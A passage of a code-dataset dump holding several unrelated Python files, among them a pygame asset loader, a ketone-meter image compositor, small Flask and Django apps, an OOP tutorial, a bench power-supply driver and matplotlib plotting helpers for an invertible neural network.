g_PyAuris.SendIDMCommand(IntFromCmd(\"START_FOLLOW\"))\n if (status == IDMStates[\"Follow\"]):\n print(\"System Ready to drive.\")\n return 0\n else:\n print(\"Unknown state (\"+ state +\"): status (\"+ StateFromInt(status) +\")\")","sub_path":"catheter_simulation/robot/private/initialize_robot_communication.py","file_name":"initialize_robot_communication.py","file_ext":"py","file_size_in_byte":12709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582440709","text":"# Used this for serialization\r\n# and deserialization of files in the game\r\nimport pickle\r\nimport levelData\r\nimport os\r\nfrom functools import lru_cache\r\nimport pygame\r\nPATH_ROOT = os.getcwd()\r\nMAPS_PATH = os.path.join(PATH_ROOT, \"Maps\")\r\n\r\n\r\ndef list_maps():\r\n map_names = []\r\n if not os.path.exists(MAPS_PATH):\r\n os.mkdir(MAPS_PATH)\r\n return map_names\r\n for files in os.listdir(MAPS_PATH):\r\n # [-4] to remove extension and just get the map name\r\n map_names.append((os.path.join(MAPS_PATH, files), files[-4]))\r\n return map_names\r\n\r\n\r\ndef get_files_paths_from_folder(folder, *folders):\r\n file_paths = []\r\n curPath = os.path.join(PATH_ROOT, folder, *folders)\r\n if not os.path.exists(curPath):\r\n return None\r\n for file in os.listdir(curPath):\r\n file_paths.append(os.path.join(curPath, file))\r\n return file_paths\r\n\r\n\r\ndef load_level(level_path):\r\n with open(level_path, \"rb\") as level:\r\n level_data = pickle.load(level)\r\n levelData.Level.load(level_data)\r\n\r\n\r\ndef load_level_object(level_path):\r\n with open(level_path, \"rb\") as level:\r\n level_data = pickle.load(level)\r\n return level_data\r\n\r\n\r\ndef save_level(level_name, level):\r\n pickle.dump(level, open(os.path.join(\r\n MAPS_PATH, str(level_name) + \".map\"), \"wb\"))\r\n\r\n# The lru cache caches the results of the function\r\n# so I dont need to create a new surface object\r\n# everytime\r\n\r\n\r\n@lru_cache(maxsize=256)\r\ndef get_sprite(sprite_pack: str, sprite_position: int):\r\n\r\n filenames_list = get_files_paths_from_folder(\r\n \"Assets\", sprite_pack, \"Sprites\")\r\n if filenames_list != None:\r\n\r\n for pos, path in enumerate(sorted(filenames_list)):\r\n if pos == sprite_position:\r\n img = pygame.image.load(path).convert_alpha()\r\n img.set_colorkey((152, 0, 136))\r\n return img\r\n img = pygame.image.load(filenames_list[0]).convert_alpha()\r\n img.set_colorkey((152, 0, 136))\r\n return img\r\n return None\r\n\r\n\r\ndef get_audio(sprite_pack, state):\r\n import random\r\n filenames_list = get_files_paths_from_folder(\r\n \"Assets\", sprite_pack, str(state))\r\n if filenames_list == None:\r\n return None\r\n audioIndex = random.randint(0, len(filenames_list)-1)\r\n audioObj = pygame.mixer.Sound(filenames_list[audioIndex])\r\n return audioObj\r\n\r\n\r\n@lru_cache(maxsize=8)\r\ndef get_cached_audio(folder_name, sub_folder):\r\n filenames_list = get_files_paths_from_folder(\r\n \"Assets\", folder_name, sub_folder)\r\n if filenames_list == None:\r\n return None\r\n audioObj = pygame.mixer.Sound(filenames_list[0])\r\n return audioObj\r\n","sub_path":"The dawn of Otrozhny/gameIO.py","file_name":"gameIO.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"122353947","text":"from tkinter import filedialog\nfrom tkinter import simpledialog\nfrom tkinter import *\nimport os\nfrom pathlib import Path\nfrom PIL import Image, ImageDraw, ImageFont\n\ndef main():\n\n # refactor into functions\n meter_images = [] # the Pillow image objects\n instagram_xy, pixel_xy, basewidth, hsize = const_values()\n\n tk_root = Tk()\n # get image filenames\n meter_images_filenames = prompt_meter_images(tk_root)\n # get other values\n d = MyDialog(tk_root)\n\n text_for_image = make_text_for_image(d.date_str, d.fasted_hrs, d.ketone, d.bg)\n meter_image_objects = convert_2_image_objects(instagram_xy, meter_images, meter_images_filenames, pixel_xy, basewidth, hsize)\n\n outfile = make_outfilename(meter_images_filenames)\n\n out = make_composite_image(basewidth, hsize, instagram_xy, meter_image_objects, meter_images,\n text_for_image)\n out.save(outfile)\n out.show()\n\n\ndef make_composite_image(basewidth, hsize, instagram_xy, meter_image_objects, meter_images,\n text_for_image):\n base_image = Image.new(\"RGBA\", (instagram_xy[0], instagram_xy[1]), color='white')\n text_layer = Image.new('RGBA', base_image.size, (0, 0, 0, 0))\n font = ImageFont.truetype('/Library/Fonts/GillSans.ttc', 48, encoding='unic')\n text_drawing = ImageDraw.Draw(text_layer)\n text_drawing.text((200, 730), text_for_image, font=font, fill=(0, 0, 0, 255))\n out = Image.alpha_composite(base_image, text_layer).convert('RGB')\n print(meter_images[0].size)\n print(meter_images[1].size)\n out.paste(meter_image_objects[0], (0, 0, basewidth, hsize))\n out.paste(meter_image_objects[1], (basewidth, 0, basewidth * 2, hsize))\n return out\n\n\ndef convert_2_image_objects(instagram_xy, meter_images, meter_images_filenames, pixel_xy, basewidth, hsize):\n\n # TODO remove\n print(basewidth, hsize)\n for img_filename in meter_images_filenames:\n print(img_filename)\n meter_img = Image.open(img_filename)\n print(meter_img.size)\n meter_images.append(meter_img.resize((basewidth, hsize)))\n return meter_images\n\n\ndef make_outfilename(meter_images_filenames):\n image_folder = meter_images_filenames[0].parent.absolute()\n print(image_folder)\n outfile = Path(image_folder) / \"upload.jpg\"\n return outfile\n\n\ndef const_values():\n instagram_xy = (1080, 865)\n pixel_xy = (3024, 4032) # image size from my Pixel 2xl phone\n basewidth = int(instagram_xy[0] / 2)\n hsize = int((basewidth / pixel_xy[0]) * pixel_xy[1])\n return instagram_xy, pixel_xy, basewidth, hsize\n\n\n\ndef make_text_for_image(date_str, fasted_hrs_str, ketone_str, bg_str):\n #\"02/25/19 --- Fasted ~25 hrs\\nGKI 4.2 - Dr. Boz Ratio 20\"\n gki, boz = calc_ratios(ketone_str, bg_str)\n text_str = f\"{date_str} --- Fasted ~{fasted_hrs_str} hrs\\nGKI {gki} Dr. Boz Ratio {boz}\"\n return text_str\n\ndef prompt_meter_images(root):\n meter_images = []\n cwd = os.getcwd()\n # assume source code in src folder and up one and down to ../images gets us to the top of the image folders\n image_dir = cwd.replace('src', 'images')\n\n # get ketone meter images\n # two images - one is blood ketone level and one is bloog glucose\n root.image_1 = filedialog.askopenfilename(initialdir=image_dir,\n title=\"Select first KetoMojo Image\", filetypes=(\n (\"jpeg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\n meter_images.append(Path(root.image_1))\n root.image_2 = filedialog.askopenfilename(initialdir=image_dir,\n title=\"Select second KetoMojo Image\", filetypes=(\n (\"jpeg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\n meter_images.append(Path(root.image_2))\n\n return meter_images\n\n\n\ndef calc_ratios(ketone_mmol_L, bg_mg_dL):\n ketone_mmol_L = float(ketone_mmol_L)\n bg_mg_dL = float(bg_mg_dL)\n gki = (round(((bg_mg_dL/18)/ketone_mmol_L),1))\n boz = (int(round(bg_mg_dL/ketone_mmol_L, 0)))\n return gki, boz\n\nclass MyDialog(simpledialog.Dialog):\n\n def body(self, master):\n\n Label(master, text=\"Ketone Level mmol/L:\").grid(row=0)\n Label(master, text=\"Blood Glucose:\").grid(row=1)\n Label(master, text=\"Fasted hours:\").grid(row=2)\n Label(master, text=\"Date mm/dd/yy:\").grid(row=3)\n self.e1 = Entry(master)\n self.e2 = Entry(master)\n self.e3 = Entry(master)\n self.e4 = Entry(master)\n\n self.e1.grid(row=0, column=1)\n self.e2.grid(row=1, column=1)\n self.e3.grid(row=2, column=1)\n self.e4.grid(row=3, column=1)\n\n return self.e1 # initial focus\n\n def apply(self):\n self.ketone = self.e1.get()\n self.bg = self.e2.get()\n self.fasted_hrs = self.e3.get()\n self.date_str = self.e4.get()\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","sub_path":"src/gen_image.py","file_name":"gen_image.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"88769125","text":"def is_palindrome(word):\n if word.lower() == word[::-1].lower():\n print('Your word is a palindrome.')\n else:\n print('Your word is not a palindrome.')\n\n\ndef is_anagram(word1, word2):\n w1 = sorted(word1.lower().replace(' ', ''))\n w2 = sorted(word2.lower().replace(' ', ''))\n if w1 == w2:\n print('Your word is an anagram.')\n else:\n print('Your word is not an anagram.')\n\n\ndef checker():\n while True:\n query = int(input('1: Palindrome\\n2: Anagram\\n3: Quit\\n\\n'))\n if query == 1:\n word = input('Enter your word: ')\n is_palindrome(word)\n elif query == 2:\n word1 = input('Enter your first word: ')\n word2 = input('Enter your second word: ')\n is_anagram(word1, word2)\n elif query == 3:\n quit()\n\n\nchecker()\n","sub_path":"palindrome_and_anagram.py","file_name":"palindrome_and_anagram.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"649021840","text":"from flask import Flask, render_template, Response, request\nfrom application import app\nimport random\n\n\n@app.route(\"/price\", methods=[\"GET\",\"POST\"])\ndef price():\n\n phone_deal = request.get_json()\n phone = {\"Iphone5\", \"Iphone6\", \"Iphone7\", \"Iphone8\"}\n colour = {\"red\", \"black\", \"white\"}\n price = (\"500\",\"600\",\"700\",\"800\")\n\n\n if phone == \"Iphone 5\":\n if colour == 'black':\n price = '500'\n elif colour == 'white':\n price = '500'\n elif colour == 'red':\n price = '500'\n\n elif phone == \"Iphone 6\":\n if colour == 'black':\n price = '600'\n elif colour == 'white':\n price = '600'\n elif colour == 'red':\n price = '600'\n\n elif phone == \"I phone 7\":\n if colour == 'black':\n price = '700'\n elif colour == 'white':\n price = '700'\n elif colour == 'red':\n price = '700'\n\n elif phone == \"I phone 8\":\n if colour == 'black':\n price = '800'\n elif colour == 'white':\n price = '800'\n elif colour == 'red':\n price = '800'\n\n else:\n return Response(random.choice(price), mimetype = \"text/plain\")\n\n\n\n\n \n\n ","sub_path":"phone_api/service_4/application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"97577515","text":"\"\"\"\nThis script runs the application using a development server.\nIt contains the definition of routes and views for the application.\n\"\"\"\n\nfrom flask import Flask, request, redirect, url_for, render_template \nfrom flask_debugtoolbar import DebugToolbarExtension\n\napp = Flask(__name__)\napp.config.from_object('config')\ntoolbar = DebugToolbarExtension(app)\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/j2')\ndef j2():\n return render_template('j2_query.html')\n\n\n@app.route('/process', methods=['POST'])\ndef process():\n _username = request.form.get('username')\n\n if _username:\n return render_template('j2_response.html', username = _username)\n else:\n return 'Please go back and enter your name . . . ', 400\n\n\n@app.route('/free_button', methods=['GET', 'POST'])\ndef free_button():\n return 'WEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE'\n\n\nif __name__ == '__main__':\n import os\n HOST = os.environ.get('SERVER_HOST', 'localhost')\n try:\n PORT = int(os.environ.get('SERVER_PORT', '5555'))\n except ValueError:\n PORT = 5555\n app.run(HOST, PORT)\n","sub_path":"explore_flask_pubs/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"471254033","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'面向对象编程'\n\n__author__ = 'garyhu'\n\nimport types;\n\nclass Person(object):\n\n\t# 可以通过__slots__来控制属性的添加,只有被solts设置的属性才可以添加到类或实例中\n __slots__ = ('__name','__age','birth','id','gender','sayHi'); # 用tuple定义允许绑定的属性名称\n\n # 定义类属性\n # scope = 123;#暂时注释了\n \n # 定义一个可以使用with的对象\n def __enter__(self):\n print('begin with')\n return self;\n \n def __exit__(self,exc_type,exc_value,traceback):\n if exc_type:\n print('Error')\n else :\n print('End')\n\n def __init__(self,name,age):\n self.__name = name;\n self.__age = age;\n\n def print_person(self):\n print(\"name: %s, age: %d\" % (self.__name,self.__age)) \n \n def getName(self):\n return self.__name;\n\n def getAge(self):\n return self.__age; \n\n def setName(self,value):\n self.__name = value;\n\n def setAge(self,value):\n self.__age = value; \n\n def checkType(self,fn):\n if type(fn) == types.FunctionType:\n print(\"自定义方法\");\n elif type(fn) == types.BuiltinFunctionType:\n print(\"系统自带方法\");\n elif type(fn) == types.LambdaType:\n print(\"LambdaType\");\n elif type(fn) == types.GeneratorType:\n print(\"生成器\"); \n else :\n print(\"类型无法判断\"); \n\nP = Person(\"Juddy\",23);\n\nprint(P._Person__name)\nP.setName(\"Tommy\")\nprint(P.getName());\nprint(P.getAge());\nP.setAge(30)\nP.print_person();\n\nprint(type(P) == Person);\n\nfn = (x for x in range(10));\nprint(fn)\nP.checkType(fn);\n\n# 查询对象属性\nif hasattr(P,'__name'):\n print(getattr(P,'__name'))\n\n# 如果对象属性不存在时,可以设置个默认值,这样就不会报错\ngetattr(P,'dog',\"wow\") \n\n# 设置一个不存在的对象属性\nif not hasattr(P,'birth'):\n setattr(P,'birth','2017-03-10') \n\nprint(P.birth);\n\n# 检查对象方法是否存在\nprint(hasattr(P,'getAge'))\n\n# print(\"通过实例来访问类属性: %d\" % P.scope)\n# print(\"通过类来访问类属性: %d\" % Person.scope)\n\nprint('<------------------------------>')\n\n# 相同名称时,实例属性会覆盖类属性,但是不会修改类属性值\n# P.scope = 9999;\n\n# print(\"通过实例来访问类属性: %d\" % P.scope)\n# print(\"通过类来访问类属性: %d\" % Person.scope)\n# print('<------------------------------>')\n\n\n# 删除实例属性,这时候访问就是类属性了\n# del P.scope;\n\n# print(\"通过实例来访问类属性: %d\" % P.scope)\n# print(\"通过类来访问类属��: %d\" % Person.scope)\n# print('<------------------------------>')\n\n\n# 打印对象所有属性的函数使用\nprint(dir(P));\n\n# 给实例定义一个方法\ndef sayHi(self,username):\n print(\"hello %s\" % username)\n\n# 这种绑定只是给P这个实例绑定该函数,其他实例无法调用\nP.sayHi = types.MethodType(sayHi,P);\n\nP.sayHi('Lucy');\n\n# 通过类来绑定,所有实例都可以访问到\nPerson.sayHi = sayHi;\n\nperson = Person(\"July.An\",43);\nperson.sayHi(\"Marry\");\n\n# 可以通过__slots__来控制属性的添加,只有被solts设置的属性才可以添加到类或实例中\n# person.rate = 100; # __slots__中没有属性rate,此处会报错\n\n\n# __slots__只限制于当前类的实例,不限制子类\nclass SubPerson(Person):\n\n def __init__(self,name,age,link):\n self.__name = name;\n self.__age = age;\n self._link = link;\n \n @property\n def rate(self):\n return self._rate;\n\n @rate.setter\n def rate(self,val):\n if not isinstance(val,(int,float)):\n raise ValueError(\"rate must is integer or float\");\n elif val < 0 or val > 1 :\n raise ValueError(\"Value must between 0~1\");\n \n self._rate = val;\n\n # 定义一个只读属性\n @property\n def link(self):\n return self._link; \n\n def __str__(self):\n return '{ SubPerson name : %s, age: %d, link: %s }' % (self.__name,self.__age,self._link); \n\n __repr__ = __str__;\n\n # 当实例访问属性不存在的时候走该方法\n def __getattr__(self,attr):\n print(\"the %s is not define!!!\" % attr);\n\n \n def __call__(self):\n print('实例本身调用'); \n\n\nsP = SubPerson('Hanny',12,\"www.toc.cn\");\n\n# 打印实例\nprint(sP);\n\nsP.write = lambda x : x*x;\n\nval = sP.write(12);\nprint(val)\n\nsP.rate = 0.8;\n\nprint(sP.rate);\n\n# link为只读属性,不可复制\n# sP.link = 122;\nprint(sP.link);\n\nsP();\n\n# 该属性没有定义的时候,会调用类定义的__getattr__函数\nsP.dsf;\n\n# callable判断一个对象是否是“可调用”对象\nprint(callable(sP));\nprint(callable(P));\nprint(callable(max));\nprint(callable('abc'));\n\n\nwith Person('DuoDuo',1) as pp1:\n n = pp1.getName()\n print(n);\n","sub_path":"base/python_obj.py","file_name":"python_obj.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"628177981","text":"\"\"\"graduationwork URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path, include\nfrom automated_system import views\nfrom django.views.generic import RedirectView\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.auth.forms import AuthenticationForm\n\nAuthenticationForm.login_is_active = \"nav_item_active\"\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('admin/', admin.site.urls),\n path('store', views.store, name='store'),\n path('storage', views.storage, name='storage'),\n path('about', views.about, name='about'),\n path('login', auth_views.LoginView.as_view(\n template_name='auth/login.html', authentication_form=AuthenticationForm), name='login'),\n path('logout', auth_views.LogoutView.as_view(\n template_name='index.html'), name='logout'),\n path('products', views.products, name='products'),\n path('profile', views.profile, name='profile'),\n path('failures', views.failures, name='failures'),\n path('analytics', views.analytics, name='analytics'),\n path('favicon.ico', RedirectView.as_view(\n url='/static/images/favicon.ico', permanent=True)),\n]\n","sub_path":"graduationwork/graduationwork/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"395921949","text":"import os\nimport json\nimport logging\n\n\ndef start_logging(who, debug):\n logging.basicConfig(\n format=f\"%(asctime)s {who}: %(levelname)s: %(message)s\",\n level=logging.DEBUG if debug else logging.INFO,\n )\n\n\ndef get_master_version():\n env = os.environ.get(\"AS_DATA_ROOT\", \".\")\n tag = os.environ.get(\"AS_CANONICAL_REGION\", None)\n if not tag:\n logging.warn(\"You need to set AS_CANONICAL_REGION. Defaulting to jp for now.\")\n tag = \"jp:ja\"\n\n region, lang = tag.split(\":\", 1)\n\n root = os.path.join(env, region)\n try:\n with open(os.path.join(root, \"astool_store.json\"), \"r\") as memof:\n memo = json.load(memof)\n return os.path.join(root, \"masters\", memo[\"master_version\"]), lang\n except (FileNotFoundError, KeyError):\n return root, lang\n\n","sub_path":"common_config.py","file_name":"common_config.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"485402916","text":"\"\"\"\n\nPython Interchangeable Virtual Instrument Library\n\nphilipsPM2810.py\nCopyright (c) 2017 Coburn Wightman\n\nDerived from rigolDP800.py \nCopyright (c) 2013-2017 Alex Forencich\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\n\"\"\"\n\nfrom .philipsPM2800 import *\n\nclass philipsPM2810(philipsPM2800):\n \"Philips/Fluke Autoranging PM2810 series IVI DC power supply driver\"\n \n def __init__(self, *args, **kwargs):\n self.__dict__.setdefault('_instrument_id', '')\n \n super(philipsPM2810, self).__init__(*args, **kwargs)\n \n self._output_count = 3\n\n # Available output modules for the PM281x series\n self._output_spec = [\n {\n 'range': {\n 'P30V': (30.0, 10.0)\n },\n 'ovp_max': 32.0,\n 'ocp_max': 10.1,\n 'voltage_max': 30.0,\n 'current_max': 10.0,\n 'power_max' : 60\n \n },\n {\n 'range': {\n 'P60V': (60.0, 5.0)\n },\n 'ovp_max': 62.0,\n 'ocp_max': 5.1,\n 'voltage_max': 60.0,\n 'current_max': 5.0,\n 'power_max' : 60\n },\n {\n 'range': {\n 'P60V': (60.0, 10.0)\n },\n 'ovp_max': 62.0,\n 'ocp_max': 10.1,\n 'voltage_max': 60.0,\n 'current_max': 10.0,\n 'power_max' : 120\n }\n ]\n \n #self._memory_size = 10\n \n self._identity_description = \"Philips/Fluke Autoranging PM2810 series IVI DC power supply driver\"\n self._identity_identifier = \"\"\n self._identity_revision = \"\"\n self._identity_vendor = \"\"\n self._identity_instrument_manufacturer = \"Philips NV\"\n self._identity_instrument_model = \"\"\n self._identity_instrument_firmware_revision = \"\"\n self._identity_specification_major_version = 3\n self._identity_specification_minor_version = 0\n self._identity_supported_instrument_models = ['PM2811', 'PM2812', 'PM2813']\n \n self._init_outputs()\n \n\n # 281x are switchmode supplies therefore power limited \n def _output_query_current_limit_max(self, index, voltage_level):\n index = ivi.get_index(self._output_name, index)\n if voltage_level < 0 or voltage_level > self._output_spec[index]['voltage_max']:\n raise ivi.OutOfRangeException()\n if voltage_level > 0:\n imax = self._output_spec[index]['power_max'] / voltage_level\n if imax > self._output_spec[index]['current_max']:\n imax = self._output_spec[index]['current_max']\n else:\n imax = self._output_spec[index]['current_max']\n return imax\n \n def _output_query_voltage_level_max(self, index, current_limit):\n index = ivi.get_index(self._output_name, index)\n if current_limit < 0 or current_limit > self._output_spec[index]['current_max']:\n raise ivi.OutOfRangeException()\n elif current_limit > 0:\n vmax = self._output_spec[index]['power_max'] / current_limit\n if vmax > self._output_spec[index]['voltage_max']:\n vmax = self._output_spec[index]['voltage_max']\n else:\n vmax = self._output_spec[index]['voltage_max']\n return vmax\n\n \n","sub_path":"contrib/philipsPM2810.py","file_name":"philipsPM2810.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"595971016","text":"#!/usr/bin/python3\n\nfrom lib import isprime\n\n# Let's just run through all the odd natural numbers starting at 3\nprimes = [2]\ntestnum = 3\nwhile len(primes) != 10001:\n if isprime(testnum):\n primes.append(testnum)\n testnum += 2\n\nprint(primes[-1])\n","sub_path":"pe0007.py","file_name":"pe0007.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"138198378","text":"# Dependency imports\nfrom flask import Flask, request\n\n\n# Flask server creation\nMY_APP = Flask(__name__)\n\n# default route definition\n@MY_APP.route('/', methods=['GET', 'POST'])\ndef root():\n if request.method == 'GET':\n return 'coucou'\n else:\n return f'Bonjour {request.get_json()[\"name\"]}'\n\n\n# App entry point\nif __name__ == '__main__':\n MY_APP.run('0.0.0.0', 8080, debug=True)\n","sub_path":"simpleRestAPI/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"639503211","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torchvision\nfrom functionalities import traverser as tra\nfrom functionalities import dataloader as dl\n\ndef plot(x, y, x_label, y_label, plot_label, title, filename, sub_dim=None, figsize=(15, 10), font_size=24, y_log_scale=False):\n \"\"\"\n Generate a plot based on given arguments. If y is a 2d numpy array/list, multiple plots will be generated within one\n diagram. If additionally x is also a 2d numpy array/list, multiple subplots will be generated.\n\n :param x: numpy array/list of x values to plot. If multiple subplots should be generated then x will be a 2d numpy\n array/list.\n :param y: numpy array/list of corresponding y values to plot. If multiple plots should be generated then y will be a\n 2d numpy array/list.\n :param x_label: label of x-axis\n :param y_label: label of y-axis\n :param plot_label: label for plots (appears in legend)\n :param title: title for the plot. Should be a list if multiple plots are generated.\n :param filename: file name under which the plot will be saved.\n :param sub_dim: dimensions of subplots. Only required, if the dimension of both x and y are 2.\n :param figsize: the size of the generated plot\n :param font_size: font size of labels\n :return: None\n \"\"\"\n \n plt.rcParams.update({'font.size': font_size})\n\n if not ('numpy' in str(type(x))):\n try:\n x = np.array(x)\n except TypeError:\n print(\"x is neither a numpy array nor a python list\")\n\n if not ('numpy' in str(type(y))):\n try:\n y = np.array(y)\n except TypeError:\n print(\"y is neither a numpy array nor a python list\")\n\n dim_x = len(x.shape)\n dim_y = len(y.shape)\n\n if (dim_x != 1 and dim_x != 2) or (dim_y != 1 and dim_y != 2) or (dim_x == 2 and dim_y == 1):\n raise ValueError(\"x has dimension {} and y has dimension {}\".format(dim_x, dim_y))\n\n if dim_x == 1 and dim_y == 1:\n fig, ax = plt.subplots(1, 1, figsize=figsize)\n ax.plot(x, y, label=plot_label)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n if y_log_scale == True:\n ax.set_yscale('log')\n ax.set_title(title)\n ax.grid(True)\n elif dim_x == 1 and dim_y == 2:\n fig, ax = plt.subplots(1, 1, figsize=figsize)\n\n for i, y_part in enumerate(y):\n ax.plot(x, y_part, label=plot_label[i])\n\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n if y_log_scale == True:\n ax.set_yscale('log')\n ax.set_title(title)\n ax.grid(True)\n ax.legend()\n elif dim_x == 2 and dim_y == 2:\n if sub_dim[0] * sub_dim[1] != len(y) or sub_dim[0] * sub_dim[1] != len(x):\n raise ValueError(\"sub_dim dimension {} does not match dimension of x {} or y {}\".format(sub_dim, len(y),\n len(x)))\n fig, ax = plt.subplots(sub_dim[0], sub_dim[1], figsize=figsize)\n\n counter = 0\n for i in range(sub_dim[0]):\n for j in range(sub_dim[1]):\n ax[i, j].plot(x[counter], y[counter], label=plot_label[counter])\n ax[i, j].set_xlabel(x_label[counter])\n ax[i, j].set_ylabel(y_label[counter])\n if y_log_scale == True:\n ax.set_yscale('log')\n ax[i, j].set_title(title[counter])\n ax[i, j].grid(True)\n counter += 1\n\n plt.tight_layout()\n \n \n\n subdir = \"./plot\"\n if not os.path.exists(subdir):\n os.makedirs(subdir)\n\n fig.savefig(os.path.join(subdir, filename + \".png\"), transparent = True, bbox_inches = 'tight', pad_inches = 0)\n\n plt.show()\n\n\ndef imshow(img, figsize=(30, 30), filename=None):\n \"\"\"\n Custom modified imshow function.\n\n :param img: image to plot\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n img = torch.clamp(img, 0, 1)\n img = img.to('cpu')\n npimg = img.numpy()\n plt.figsize = figsize\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n\n if filename is not None:\n subdir = \"./plot\"\n if not os.path.exists(subdir):\n os.makedirs(subdir)\n\n plt.savefig(os.path.join(subdir, filename + \".png\"), transparent = True, bbox_inches = 'tight', pad_inches = 0)\n\n plt.show()\n\n\ndef plot_reconst(model, loader, latent_dim, device='cpu', num_img=1, grid_row_size=10, figsize=(30, 30), filename=None, conditional=False):\n \"\"\"\n Plot original images and the reconstructed images by the INN\n\n :param model: INN use for reconstruction\n :param loader: loader that wraps the train, test or evaluation set\n :param latent_dim: dimension of the latent space\n :param num_img: number of images to plot. Default: 1\n :param grid_row_size: number of images in one row in the grid\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: img: original images\n output: reconstructed images\n \"\"\"\n\n img, label = next(iter(loader))\n\n #model = model.to('cpu')\n model.eval()\n\n img = img.to(device)\n\n lat_img = model(img)\n shape = lat_img.shape\n lat_img = lat_img.view(lat_img.size(0), -1)\n if conditional:\n binary_label = lat_img.new_zeros(lat_img.size(0), 10)\n idx = torch.arange(label.size(0), dtype=torch.long)\n binary_label[idx, label] = 1\n lat_img_mod = torch.cat([lat_img[:, :latent_dim], binary_label, lat_img.new_zeros((lat_img[:, latent_dim+10:]).shape)], dim=1)\n else:\n lat_img_mod = torch.cat([lat_img[:, :latent_dim], lat_img.new_zeros((lat_img[:, latent_dim:]).shape)], dim = 1)\n\n lat_img_mod = lat_img_mod.view(shape)\n output = model(lat_img_mod, rev=True)\n\n print(\"Original Image:\")\n imshow(torchvision.utils.make_grid(img[:num_img].detach(), grid_row_size), figsize,\n filename + \"_original\" if (filename is not None) else None)\n print(\"Reconstructed Image:\")\n imshow(torchvision.utils.make_grid(output[:num_img].detach(), grid_row_size), figsize,\n filename + \"_reconstructed\" if (filename is not None) else None)\n\n return img, output\n\n\ndef plot_diff(model, loader, latent_dim, device='cpu', num_img=1, grid_row_size=10, figsize=(30, 30), filename=None, conditional=False):\n \"\"\"\n Plot original images, reconstructed images by the INN and the difference between those images.\n\n :param model: INN use for reconstruction\n :param loader: loader that wraps the train, test or evaluation set\n :param latent_dim: dimension of the latent space\n :param num_img: number of images to plot. Default: 1\n :param grid_row_size: number of images in one row in the grid\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n\n img, reconst_img = plot_reconst(model, loader, latent_dim, device, num_img, grid_row_size, figsize, filename, conditional)\n\n diff_img = (img - reconst_img + 1) / 2\n\n print(\"Difference:\")\n imshow(torchvision.utils.make_grid(diff_img[:num_img].detach(), grid_row_size), figsize,\n filename + \"_difference\" if (filename is not None) else None)\n\n\ndef 